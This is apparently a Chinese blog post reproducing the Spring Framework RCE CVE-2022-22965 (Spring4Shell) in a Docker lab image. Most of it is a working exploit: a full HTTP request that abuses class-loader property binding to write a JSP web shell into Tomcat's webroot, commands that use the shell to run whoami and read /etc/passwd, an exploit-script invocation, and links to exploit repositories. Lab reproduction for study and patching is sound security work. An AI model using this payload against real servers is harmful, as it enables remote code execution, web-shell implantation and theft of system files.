复现SpringFramework CVE-2022-22965
2022-05-31 本文已影响0人
migrate_
遵纪守法
任何个人和组织使用网络应当遵守宪法法律,遵守公共秩序,尊重社会公德,不得危害网络安全,不得利用网络从事危害国家安全、荣誉和利益
漏洞复现环境
docker pull vulfocus/spring-core-rce-2022-03-29
docker run -d -p 8090:8080 --name springrce -it vulfocus/spring-core-rce-2022-03-29
1.png
利用Burp 写Shell (fileDateFormat=后面换不同的字符可以写入多个shell文件)
POST / HTTP/1.1
Host: 192.168.52.132:8090
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
suffix: %>//
c1: Runtime
c2: <%
DNT: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 761
class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7Bc2%7Di%20if(%22S%22.equals(request.getParameter(%22Tomcat%22)))%7B%20java.io.InputStream%20in%20%3D%20%25%7Bc1%7Di.getRuntime().exec(request.getParameter(%22cmd%22)).getInputStream()%3B%20int%20a%20%3D%20-1%3B%20byte%5B%5D%20b%20%3D%20new%20byte%5B2048%5D%3B%20while((a%3Din.read(b))!%3D-1)%7B%20out.println(new%20String(b))%3B%20%7D%20%7D%20%25%7Bsuffix%7Di&class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp&class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT&class.module.classLoader.resources.context.parent.pipeline.first.prefix=Shell&class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat=
访问shell
http://target.com:8090/Shell.jsp?Tomcat=S&cmd=whoami
3.png
利用脚本
python CVE-2022-22965.py http://target.com:8090 whoami
python CVE-2022-22965.py http://target.com:8090 "cat /etc/passwd"
4.png
exp
https://github.com/Axx8/SpringFramework_CVE-2022-22965_RCE
https://github.com/liangyueliangyue/spring-core-rce
